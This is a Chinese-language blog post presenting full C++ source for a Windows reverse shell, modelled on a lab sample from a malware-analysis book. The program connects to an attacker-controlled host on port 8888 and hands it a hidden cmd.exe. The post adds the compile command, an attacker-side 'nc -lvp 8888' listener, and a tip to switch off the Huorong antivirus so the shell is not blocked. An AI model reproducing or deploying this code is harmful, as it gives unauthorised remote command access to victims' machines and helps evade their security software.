C++写一个简单的反弹Shell程序

前言

最近学习《恶意代码分析实战》第九章，Lab09-02.exe这个文件比较有意思，核心程序是一个反向shell，于是就想模仿该文件实现一下。

实现

#include <iostream>
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <synchapi.h>
using namespace std;

SOCKET Winsock;
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in hax; // 地址结构
char ip_addr[16] = "*.*.*.*"; // ip地址（或者主机名）
char port[6] = "8888";              // 端口
// 指定新进程主窗口的特性
STARTUPINFO ini_processo;

// 返回有关新进程及其主线程的信息
PROCESS_INFORMATION processo_info;

int __cdecl main(){   
    int err;
    while(1){
        err = WSAStartup(MAKEWORD(2, 2), &wsaData);
        if(err != 0){
            printf("WSAStartup failed with error: %d\n", err);
            return 1;
        }
        Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        if(Winsock==INVALID_SOCKET){
            wprintf(L"WSASocket function failed with error = %d\n", WSAGetLastError() );
        }
        else{
            struct hostent *host; // 黑客主机信息
            host = gethostbyname(ip_addr);
            strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
            hax.sin_family = AF_INET;
            hax.sin_port = htons(atoi(port));
            hax.sin_addr.s_addr = inet_addr(ip_addr);
            memset(&hax.sin_zero, 0, 8);
            err = connect(Winsock, (struct sockaddr *)&hax, sizeof(struct sockaddr));
            if (err == SOCKET_ERROR) {
                wprintf(L"connect function failed with error: %ld\n", WSAGetLastError());
                return 1;
            }else{
                memset(&ini_processo, 0, sizeof(ini_processo)); //初始化结构体
                ini_processo.cb = sizeof(ini_processo);
                ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; // 重定向，隐藏窗口
                // 将标准输入、输出、错误重定向到socket句柄
                ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

                TCHAR cmd[255] = TEXT("cmd.exe");

                CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);

                return 0;
            }
            err = closesocket((SOCKET)Winsock);
            if(err == SOCKET_ERROR){
                wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError());
                WSACleanup();
                return 1;
            }
            WSACleanup();
            return 0;
        }
        Sleep(30000); //休眠30s
    }
    return 0;
}

使用如下命令编译：

g++ reverse_shell_win.cpp -static -lwsock32 -lws2_32 -o reverse_shell_win.exe

在攻击机上监听端口

nc -lvp 8888

记得关掉火绒，不出意外反弹shell时候应该是会被火绒拦截。

image.png